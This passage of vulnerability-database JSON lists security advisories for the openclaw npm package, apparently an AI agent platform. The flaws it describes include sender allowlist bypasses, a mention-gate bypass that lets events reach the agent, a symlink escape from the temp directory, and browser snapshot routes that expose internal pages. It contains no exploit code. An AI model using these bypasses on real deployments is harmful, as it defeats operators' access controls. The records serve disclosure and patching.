vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-9vvh-2768-c8vp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5u41-c7kc-u7fe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90072?format=json","vulnerability_id":"VCID-6849-th74-yqd5","summary":"OpenClaw: Google Chat and Zalouser group sender allowlist bypass via policy downgrade\n## Summary\n\nWhen only a route-level group allowlist was configured, sender policy resolution silently downgraded from `allowlist` to `open` instead of preserving the configured group policy.\n\n## Impact\n\nAny member of an allowlisted Google Chat space or Zalouser group could interact with the bot even when the operator intended sender-level restrictions.\n\n## Affected Component\n\n`extensions/googlechat/src/monitor-access.ts, extensions/zalouser/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `e64a881ae0` (`Channels: preserve routed group policy`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33578","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01537","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01544","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02193","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33578"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e64a881ae0fb8af18e451163f4c2d611d60cc8e4","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e64a881ae0fb8af18e451163f4c2d611d60cc8e4"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-63mg-xp9j-jfcm","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-63mg-xp9j-jfcm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33578","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33578"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-policy-allowlist-bypass-via-policy-downgrade-in-google-chat-and-zalouser-extensions","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-policy-allowlist-bypass-via-policy-downgrade-in-google-chat-and-zalouser-extensions"},{"reference_url":"https://github.com/advisories/GHSA-63mg-xp9j-jfcm","reference_id":"GHSA-63mg-xp9j-jfcm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-63mg-xp9j-jfcm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-33578","GHSA-63mg-xp9j-jfcm"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6849-th74-yqd5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91053?format=json","vulnerability_id":"VCID-6bxd-kbse-sudx","summary":"OpenClaw: BlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events\n## Summary\n\nBlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBlueBubbles group reaction events previously bypassed `requireMention` and still enqueued agent-visible system events in groups that were supposed to stay mention-gated. Commit `f8c98630785288cc1f1d0893503ef3b653a3cede` applies the reaction path to the same mention gate as normal group messages.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f8c98630785288cc1f1d0893503ef3b653a3cede`.\n\n## Fix Commit(s)\n\n- `f8c98630785288cc1f1d0893503ef3b653a3cede`","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f8c98630785288cc1f1d0893503ef3b653a3cede","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/f8c98630785288cc1f1d0893503ef3b653a3cede"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mw7w-g3mg-xqm7","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mw7w-g3mg-xqm7"},{"reference_url":"https://github.com/advisories/GHSA-mw7w-g3mg-xqm7","reference_id":"GHSA-mw7w-g3mg-xqm7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mw7w-g3mg-xqm7"}],"fixed_packages":[],"aliases":["GHSA-mw7w-g3mg-xqm7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6bxd-kbse-sudx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91195?format=json","vulnerability_id":"VCID-6rha-8r5p-jyb7","summary":"Duplicate Advisory: OpenClaw has browser trace/download path symlink escape in temp output handling\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-36h3-7c54-j27r. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.25 contain a symlink traversal vulnerability in browser trace and download output path handling that allows local attackers to escape the managed temp root directory. An attacker with local access can create symlinks to route file writes outside the intended temp directory, enabling arbitrary file overwrite on the affected system.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/496a76c03ba85e15ea715e5a583e498ae04d36e3","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/496a76c03ba85e15ea715e5a583e498ae04d36e3"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-browser-trace-download-path-handling","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-browser-trace-download-path-handling"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32054","reference_id":"CVE-2026-32054","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32054"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-36h3-7c54-j27r","reference_id":"GHSA-36h3-7c54-j27r","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-36h3-7c54-j27r"},{"reference_url":"https://github.com/advisories/GHSA-ffr4-mrhv-vfr2","reference_id":"GHSA-ffr4-mrhv-vfr2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ffr4-mrhv-vfr2"}],"fixed_packages":[],"aliases":["GHSA-ffr4-mrhv-vfr2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6rha-8r5p-jyb7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89059?format=json","vulnerability_id":"VCID-6wth-qthz-yud8","summary":"OpenClaw: Browser snapshot and screenshot routes could expose internal page content after navigation\n## Summary\n\nBrowser snapshot and screenshot routes could expose internal page content after navigation.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nAuthenticated browser tool callers could use snapshot, screenshot, or tab routes that did not consistently validate the final browser target after route-driven navigation. In restrictive browser SSRF configurations this could expose content from internal or otherwise disallowed pages.\n\n## Technical Details\n\nThe fix re-checks browser snapshot, screenshot, and tab route results against the configured browser SSRF policy before returning page content. Regression coverage was added around snapshot/screenshot and tab-route flows.\n\n## Fix\n\nThe issue was fixed in #66040. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `b75ad800a59009fc47eaa3471410f69046150e59`\n- PR: #66040\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42436","reference_id":"","reference_type":"","scores":[{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.09041","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10552","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.1059","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42436"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b75ad800a59009fc47eaa3471410f69046150e59","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b75ad800a59009fc47eaa3471410f69046150e59"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66040","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66040"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qm-58hj-j6pj","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qm-58hj-j6pj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42436","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42436"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-internal-page-content-exposure-via-browser-snapshot-and-screenshot-routes","reference_id":"","reference_type":"","scores":[{"value":"